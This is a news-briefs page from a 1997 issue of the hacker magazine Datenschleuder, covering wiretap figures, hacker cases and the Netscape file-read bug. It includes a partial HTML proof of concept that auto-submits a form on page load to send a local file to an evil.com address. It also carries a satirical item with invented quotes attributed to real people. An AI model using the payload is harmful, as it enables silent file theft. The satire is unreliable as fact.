[Chaos CD]
[Datenschleuder] [59]    Kurzmeldungen
[Gescannte Version] [ -- ] [ ++ ] [Suchen]  

 

Kurzmeldungen

Deutschland

1996 soviele Telefone abgehört wie niemals zuvor

Das Bundeskriminalamt und die Bundesan-waltschaft haben im vergangenen Jahr soviele Telefone abhören lassen wie nie zuvor. Demnach wurden insgesamt 4674 fest installierte Anschlüsse mit richterlicher Genehmigung angezapft.

Das seien 27,5 Prozent mehr als im Vorjahr gewesen. Auch die Zahl der überwachten Funk-Telefone erreichte mit 1929 abgehörten Mobilanschlüssen Rekordhöhe. Die Abhöraktionen kosteten insgesamt weit mehr als eine Million Mark.

AFP/Bild 15.05.1997

Europa

Internet Provider Takes On Top European Carriers

One of Europe's leading independent Internet service providers is to launch anti-trust actions against the European Union's top three telecommunications carriers.

EuNet International, a Dutch-based ISP, said Tuesday it is set to launch a slate of complaints to the European Commission over alleged dirty tricks including abuse of dominant market position and unexplained delays to services promised to EuNet - by top EU telecom carriers attempting to protect their online service business against the independent ISPs.

EuNet International product development director Johan Helsingius said his company will file complaints to the European Commission against Deutsche Telekom, France Telecom and British Telecom. EuNet has already filed one complaint last month, against Belgium's national carrier Belgacom. Outside the EU, the company has won a case against Swiss PTT over unfair subsidies to its own online service, Helsingius said. “Belgacom has shown discriminatory practice toward us on almost everything, including delaying on deliverables without explanation," Helsingius said at a European chief executives' conference organized by the Wall Street Journal here. “There's no decision yet, because the commission is still investigating the case."

The EC regulates competition in the 15 countries of the European Union. “But that [the complaint against Belgacom] is just a pilot," Helsingius added. “We have a box full of other complaints against incumbent operators in Germany, the United Kingdom and France. In Germany, Deutsche Telekom is so strong in the market that they just dominate." EuNet International, which runs its own Internet backbone but needs to interconnect with local networks, is also unhappy with its treatment from Dutch operator PTT Nederland, Helsingius said, but he added: “They are not the worst offenders" EC competition officials declined to confirm whether the commission will launch a full investigation over the Belgacom case.

We are doing our duty, and Belgacom knows us very well," said one senior competition official, who could not be quoted by name.

Complaints against European national telephone companies by ISPs and by independent telecom carriers are expected to increase during the next six months, as the EU prepares for the liberalization of telecom markets in January 1998.

But though the European telecom services market is supposed to be open to competition by January next year, the EC has yet to work out how it will treat Net-based services - such as Internet telephony - which compete

directly with traditional carriers. The EC said in May it was setting up a special unit to deal with complaints of anti-competitive behavior in the run-up to liberalization of the telecom market.

Peter Chapman, Techwire 06.04.1997

(Johan Helsingius aka Julf war über lange Jahre

hinweg der Betreiber von anon.penet.fi)

Planet Erde

Biologische Kriegsführung: Kuba beschuldigt USA

Laut CNN-Web vom 15.5.1997 sehen sich kubanische Farmer derzeit mit einem Problem konfrontiert, das sie bislang nur mit der Lupe erkennen können: ihre Ernte wird durch einen winzigen Schädling namens “Thryps palmi" bedroht. Sämtliche Pestizide haben sich als ineffektiv erwiesen. Das Insekt hat bereits einen erheblichen Teil der kuba-nischen Gemüseernte (Kohl, Tomaten, Gurken, Bohnen) befallen, so daß massive Preisanstiege zu erwarten sind, wenn die Insektenplage anhält.

Die kubanische Regierung wirft den USA biologische Kriegsführung vor. Ein US-Flugzeug soll den Schädling im letzten Oktober über Kuba ausgesetzt haben. Washington dementiert.

Die Meldung war einen halben Tag auf dem CNN-Server und verschwand dann...

Internet

Masterspy Turned Out to be Schoolboy Hacker

LONDON - A masterspy believed by the Pentagon to be the No. 1threat to U.S. security and deadlier than the KGB turned out to be a British schoolboy hacker working out of his bedroom. U.S. military chiefs feared that an East European spy ring had gained access to their innermost intelligence secrets and hacked into American Air Defense systems.

But a 13-month investigation and a dramatic police raid on his London home revealed that 16-year-old music student Richard Pryce was the culprit. Pryce, known on the internet as “The Datastream Cowboy," was fined $1,915 Friday by a London court after what his lawyer called “a schoolboy prank"reminiscent of the movie “War Games." The U.S. Senate armed services committee was told the mystery hacker was the number one threat to U.S. security. He was said to havedownloaded dozens of secret files, including details of the research and development of ballistic missiles. Up to 200 security breaches were logged. Using a $1,200 computer and modem, Pryce hacked into computers at Griffiss Air Base in New York and a network in California run by the missile and aircraft manufacturer Lockheed. “Those places were a lot easier to get into than university computers in England," Pryce told reporters. “It was more of a challenge really, going somewhere I wasn't meant to. If you set out to go somewhere and you get there, other hackers would be impressed," he said. His prank put Pryce on the front pages of most British newspapers Saturday with tales of “The Schoolboy masterspy" and “The Boy who cracked open the Pentagon."

Pryce, now 19, has been offered sizeable sums for the book and film rights to his story but his parents say he prefers to stick to his double bass and concentrate on winning a place in a leading London orchestra.

“Quite remarkably in a society dominated by sleaze, he has refused all the offers and wants xto resume his quiet life," said his father, Nick Robertson. His computer skills were not reflected in his exam results - he was only awarded a 'D' grade.

Reuter 22.03.1997

Internet

Sex-Straftäter am Internet-Pranger

Seattle - Sex-Straftäter stehen im US-Bundes-staat Alaska nach ihrer Haftentlassung am elektronischen Pranger. Wer wegen Vergewaltigung, Kindesmißbrauch oder Verbreitung von Pornographie verurteilt wurde, wird mit Namen und Adresse auf einer neuen Webseite angegeben. Sie sei ein voller Erfolg, sagte die Polizei in Anchorage. In den ersten 24 Stunden seit ihrer Einrichtung sei sie fast 4000 mal angewählt worden. Wie in vielen anderen US-Bundesstaaten sollten die Bürger durch die Veröffentlichung wissen, wer in ihrer Mitte wohne.

dpa 13.06.1997

Internet

Hackers hit Polish prime minister's website

WARSAW - A hacker broke into the Polish cabinet's internet website over the weekend, altering its heading to read “Hackpublic of Poland" and “Government Disinformation Center," a newspaper reported Wednesday. Internet users seeking information from the prime minister's office found themselves referred to the site of Playboy magazine by the unknown hacker, who signed him or herself “Damage.Inc," the daily Gazeta Wyborcza said. An official in the office which produced the government website told Reuters Wednesday it had been withdrawn pending the provision of new security codes.A copy of the altered version could still be viewed on http://www.software.com.pl/intdev/news/welcomep.html, the server of the Net Security Institute (IBS) in Warsaw. The newspaper quoted government spokeswoman Aleksandra Jakubowska as saying that the cabinet website was not connected to the government's internal computer network so there was no danger of using the internet to access government secrets.

Reuter 07.05.1997

Internet

Japan police say hacker replaced weather with porn

TOKYO, (23.05.1997/Reuter) - Japanese police on Friday arrested a 27-year-old computer engineer suspected of replacing public weather charts on the Internet with pornographic pictures. A spokesman for Osaka police said Koichi Kubojima, a resident of the northern Tokyo suburb of Fujimi, was the first person in Japan to be arrested for suspected violation of a 1987 anti-hacker law.

Kubojima is accused of taking over seven web pages of the Osaka-based television network Asahi Broadcasting Company on May 18 and replacing five of the seven weather charts on the pages with pornographic pictures. He also faces charges under Japan's anti-obscenity laws. Police said Kubojima told investigators he was just trying to have some fun and tried but failed to delete the pictures when he learned that his own actions were being reported all over on the Internet. He used a fake password obtained from a local Internet provider to enter the website from his personal computer at home, but his operations were retraced by investigators through phone records kept at the provider firm, police said. If convicted, Kubojima faces a fine of one million yen ($8,600) and a prison term of up to five years under tough penalties against hackers adopted in 1992.

Bugs

Netscape Security Flaw is a feature

Many of us have been watching the CNN reports-headline reports at that-that all past and current versions of Netscape on all platforms have reportedly carried the bug that allows any Web site being hit by Netscape to examine files on the user's hard disk.

(A demonstration by the Danish team was compelling. CNN-FN generated a text file, placed it on their hard disk, and accessed the Danish site. Moments later, the Danes read back the text file. Over and over for more examples. They _could have been_ the NSA Web site, and the files could have been history files, passphrase files, etc. History files are common, and give captured kestrokes, of course.)

But how could such a massive, massive flaw have gone undiscovered for so long?

The answer, “It's a feature, not a bug."

According to Netscape spokesmen, this feature was added to the kernel of Mosaic, then Navigator, in 1993, as part of the Clipper Key Recovery Program. As James Clarke put it an interview tonight on MSNBC, “Dorothy Denning asked us to insert the “remote read" capabilities to ensure that the legitimate needs of law enforcement are met. No person cruising the Web has any expectation of privacy, as even Declan McCullagh has pointed out." Marc Rotenberg commented, “Privacy at the individual user level is unimportant, just so long as a Privacy Ombudsman can decide on the legitimate needs of law enforcement."

Meanwhile, Microsoft has acknowledge that all lines to its Redmond site are clogged by people dumping Navigator and trying to download Explorer.

-Tim May, [email protected]

Netscape Exploit

Here is a sample it isn't complete but you get the basic idea of what is going on

<HTML><HEAD><TITLE>Evil-DOT-COM Homepage</TITLE><HEAD>

<BODY onLoad="daForm.submit()">

<FORM>

NAME="daForm"

ACTION="http://evil.com/cgi-bin/formmail.pl"

METHOD=POST

<INPUT TYPE=FILE VALUE="c:\config.sys" Name="Save This Document on your Harddrive"

<INPUT TYPE=HIDDEN NAME="recipient" value="[email protected]"

and so on and so forth...

Lucky Green <[email protected]>

...Bugs...

Netscape privacy problem reproduced

Using information gleaned from the web site of the Danish company that first reported the problem, Keith Woodard and Dave Humphrey at EIFIST have built a web page which reproduces the privacy problem in Netscape Navigator and Communicator web browsers. From that effort they have developed a better understanding of how the Netscape bug works, and what defensive measures users can take until a bugfix is available from Netscape. First, the problem is indeed read-only, and involves only files to which the explicit path name is known. Second, all file systems accessible from the Netscape user's system are reachable - that means mapped network drives as well as the local hard disk. Third, JavaScript can be used by a web site to automate reading a user's file so that it is invisible to the user. However, the bug does not involve use of Java at all.

The demo website can be visited at the following URL:

http://eifist.frb.org/hacker/fileupload.html

Please urge all Internet web users to take the following interim steps until a permanent fix is available from Netscape:

  • In Navigator 3.x and 2.x, go to the Options menu and select Security Preferences. Select the “Submitting a Form Insecurely" preference to enable that warning dialog box. This will generate a warning box whenever a site tries to upload a form, giving the user a chance to decide whether to allow it.

  • Also, in Navigator 3.x and 2.x, go to the Options menu and select Network Preferences. Turn OFF the “Enable JavaScript" preference. This will block execution of JavaScript code which might try to perform an invisible file upload, while permitting display of the rest of the page.These measures are temporary until a full bug fix is made available by Netscape and proven against the EIFIST demo page.

Regards

NT Insecurity

In order to expose the flaw and demonstrate these potential vulne abilities,NTsecurity.com created a program tool called RedButton. When executed, RedButton exploits the flaw and does the following: - logs on remotely to a Target computer without presenting any User Name and Password- gains access to the resources published to Everyone - determines the current name of Built-in Administrator account (thus demonstrating that it is useless to rename it) - reads several registry entries (i.e. it displays the name of Registered Owner) - lists all shares (including the hidden ones) RedButton is not an intruder's tool, and it does not increase any security risks or vulnerability. However, it demonstrates how a potential intruder can exploit an NT system.

http://www.ntsecurity.com/RedButton/index.htm

Evolution

Absolution für Ladendiebe

Supermärkte seien wie Krebsgeschwüre für das soziale Leben in den Städten, meint der anglikanische Geistliche John Papworth. Deshalb sei Ladendiebstahl keine Sünde. Die Kirche von England reagierte ebenso ungehalten wie Supermarktketten und der britische Innenminister. Doch Papworth läßt sich nicht beirren: Jesus habe zwar Nächstenliebe gepredigt, er habe aber nicht gesagt: “Du sollst Marks und Spencer lieben", sagte der Geistliche in Anspielung eine britische Supermarktkette.

Quelle: CriminalDigest 2/97

De-Evolution

Pay per view execution?

In the U.S. Timothy McVeigh might get a pay-per-view execution prime time. In middle ages executions were popular spectacles: it was a way for powerful (nobles, kings, church, etc.) to show their power in most flagrant way to the peasants and just ordinary plebs. It was also a way for the public to participate in the punishment of the perceived evil - whether it was a real Jeffrey Dahmer like psycho, or a woman accused for witchcraft. Watching the criminal die for his/hers crimes or sins works cathartic on people. It also reinforces the public belief in justice, order and the state. Only later in our development as humans did we decide that an execution is actually a state sponsored murder, and no murder is justified under the rule of God, so, therefore, while many governments did not dispense off death penalty, they usually restrained themselves from televising executions and instead showing them just to the close range of relatives of victims. To make an execution public like in the case of Tim McVeigh, would be like returning to the 15th century. Arguably, in the case of Oklahoma City bombing, the victims were random Americans, and by extension each resident of the U.S. can be considered their relative, proponents of the televised execution may say. However, public was never in the entire history CHARGED to view an execution. How many people would actually pay to watch Timothy die? Imagine after a day of hard work, you relax on your couch, pop up a beer can and order a nice pay-per-view execution. Watch him die in privacy and convenience of your own apartment. How much should it cost? How much would people be willing to pay? Should the victims and their relatives be paid royalties - I mean, their suffering brought down the sentence and the execution, but they did not actively participate in the business. Will cable companies let them watch execution for free, or at some discount at least? Bizarre as it is - introduction of pay-per-view executions may reduce the backlog on the death row: now, when there is money to be made, maybe there will be state licensed lethal injection private practitioners (Kevorkian, as a person with immense experience, should apply), and the process of “delivering justice" may speed up considerably.

http://www.peacenet.org/balkans/

# Ursprung : /APC/GEN/RADIO

## Ersteller: [email protected]

PO Box 46, NYC NY 10029, USA

 

  [Chaos CD]
[Datenschleuder] [59]    Kurzmeldungen
[Gescannte Version] [ -- ] [ ++ ] [Suchen]